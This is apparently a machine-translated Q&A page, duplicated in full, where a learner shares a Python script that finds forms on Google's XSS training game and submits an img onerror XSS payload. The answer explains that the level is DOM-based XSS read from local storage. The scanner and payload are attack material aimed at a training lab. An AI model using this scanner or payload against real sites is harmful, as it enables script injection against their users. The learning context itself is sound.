如何为 XSS 攻击提交表单(包含文本区域和输入字段)python?
How can I submit form (containing text areas and Input fields) python for XSS attack?
我一直在学习 XSS 并解决 google 为 XSS 构建的游戏
http://www.xss-game.appspot.com/level2/frame
我成功找到了这个级别的解决方案,即在图像标签中包装脚本,但我无法使用下面的 python 代码找到漏洞。
from bs4 import BeautifulSoup
from bs4.element import Script
from requests_html import HTMLSession
from urllib.parse import urljoin
from bs4 import BeautifulSoup
session = HTMLSession()
def retrieve_all_forms(url):
r = session.get(url)
soup = BeautifulSoup(r.html.html,"html.parser")
return soup.find_all("form")
def retrieve_form_details(form):
form_details = {}
form_details["action"] = form.attrs.get("action").lower()
form_details["request_method"] = form.attrs.get("method","get").lower()
input_tags_info = []
for itag in form.find_all("input"):
type = itag.attrs.get("type", "text")
name = itag.attrs.get("name")
value = itag.attrs.get("value", "")
input_tags_info.append({"type":type,"name":name,"value":value})
for ttag in form.find_all("textarea"):
name = ttag.attrs.get("name")
value = ttag.attrs.get("value", "")
type = ttag.attrs.get("type", "text")
input_tags_info.append({"type":type,"name":name,"value":value})
form_details["inputs"] = input_tags_info
return form_details
def payload_insulation(form, payload):
for itag in form["inputs"]:
if itag["type"] !="hidden" and itag["type"] !="submit":
print(itag)
itag["value"] = payload
#print(form["inputs"])
return form
def submit_form(url,form,payload):
data ={}
#print(form["inputs"])
for itag in form["inputs"]:
data[itag["name"]] = itag["value"]
print(data)
if form["request_method"] == "post":
res = session.post(url, data=data)
elif form["request_method"] == "get":
res = session.get(url, params=data)
#print(res.text)
if payload in res.text:
return 1
else:
return 0
def form_xss(url,payload):
forms = retrieve_all_forms(url)
results = []
i=1
for form in forms:
form_details =retrieve_form_details(form)
form = payload_insulation(form_details,payload)
if submit_form(url,form,payload) == 1:
results.append((payload,True))
#print("="*50, f"form #{i}", "="*50)
#print(form_details)
return results
print(form_xss("http://www.xss-game.appspot.com/level2/frame",'<img src=x onerror="alert(String.fromCharCode(88,83,83))"/>'))
我一直在尝试通过 post 发送数据,但 img 标签没有出现在响应中。谁能告诉我这段代码中缺少什么?谢谢
帖子是使用 JavaScript 从本地存储中读取的,如页面源中所示:
function displayPosts() {
var containerEl = document.getElementById("post-container");
containerEl.innerHTML = "";
var posts = DB.getPosts();
for (var i=0; i<posts.length; i++) {
var html = '<table class="message"> <tr> <td valign=top> '
+ '<img src="/static/level2_icon.png"> </td> <td valign=top '
+ ' class="message-container"> <div class="shim"></div>';
html += '<b>You</b>';
html += '<span class="date">' + new Date(posts[i].date) + '</span>';
html += "<blockquote>" + posts[i].message + "</blockquote";
html += "</td></tr></table>"
containerEl.innerHTML += html;
}
}
所以这是一个基于 DOM 的 XSS,它不会在响应中包含标签,因为它需要 JavaScript 和 运行 的本地存储。
我一直在学习 XSS 并解决 google 为 XSS 构建的游戏
http://www.xss-game.appspot.com/level2/frame
我成功找到了这个级别的解决方案,即在图像标签中包装脚本,但我无法使用下面的 python 代码找到漏洞。
from bs4 import BeautifulSoup
from bs4.element import Script
from requests_html import HTMLSession
from urllib.parse import urljoin
from bs4 import BeautifulSoup
session = HTMLSession()
def retrieve_all_forms(url):
r = session.get(url)
soup = BeautifulSoup(r.html.html,"html.parser")
return soup.find_all("form")
def retrieve_form_details(form):
form_details = {}
form_details["action"] = form.attrs.get("action").lower()
form_details["request_method"] = form.attrs.get("method","get").lower()
input_tags_info = []
for itag in form.find_all("input"):
type = itag.attrs.get("type", "text")
name = itag.attrs.get("name")
value = itag.attrs.get("value", "")
input_tags_info.append({"type":type,"name":name,"value":value})
for ttag in form.find_all("textarea"):
name = ttag.attrs.get("name")
value = ttag.attrs.get("value", "")
type = ttag.attrs.get("type", "text")
input_tags_info.append({"type":type,"name":name,"value":value})
form_details["inputs"] = input_tags_info
return form_details
def payload_insulation(form, payload):
for itag in form["inputs"]:
if itag["type"] !="hidden" and itag["type"] !="submit":
print(itag)
itag["value"] = payload
#print(form["inputs"])
return form
def submit_form(url,form,payload):
data ={}
#print(form["inputs"])
for itag in form["inputs"]:
data[itag["name"]] = itag["value"]
print(data)
if form["request_method"] == "post":
res = session.post(url, data=data)
elif form["request_method"] == "get":
res = session.get(url, params=data)
#print(res.text)
if payload in res.text:
return 1
else:
return 0
def form_xss(url,payload):
forms = retrieve_all_forms(url)
results = []
i=1
for form in forms:
form_details =retrieve_form_details(form)
form = payload_insulation(form_details,payload)
if submit_form(url,form,payload) == 1:
results.append((payload,True))
#print("="*50, f"form #{i}", "="*50)
#print(form_details)
return results
print(form_xss("http://www.xss-game.appspot.com/level2/frame",'<img src=x onerror="alert(String.fromCharCode(88,83,83))"/>'))
我一直在尝试通过 post 发送数据,但 img 标签没有出现在响应中。谁能告诉我这段代码中缺少什么?谢谢
帖子是使用 JavaScript 从本地存储中读取的,如页面源中所示:
function displayPosts() {
var containerEl = document.getElementById("post-container");
containerEl.innerHTML = "";
var posts = DB.getPosts();
for (var i=0; i<posts.length; i++) {
var html = '<table class="message"> <tr> <td valign=top> '
+ '<img src="/static/level2_icon.png"> </td> <td valign=top '
+ ' class="message-container"> <div class="shim"></div>';
html += '<b>You</b>';
html += '<span class="date">' + new Date(posts[i].date) + '</span>';
html += "<blockquote>" + posts[i].message + "</blockquote";
html += "</td></tr></table>"
containerEl.innerHTML += html;
}
}
所以这是一个基于 DOM 的 XSS,它不会在响应中包含标签,因为它需要 JavaScript 和 运行 的本地存储。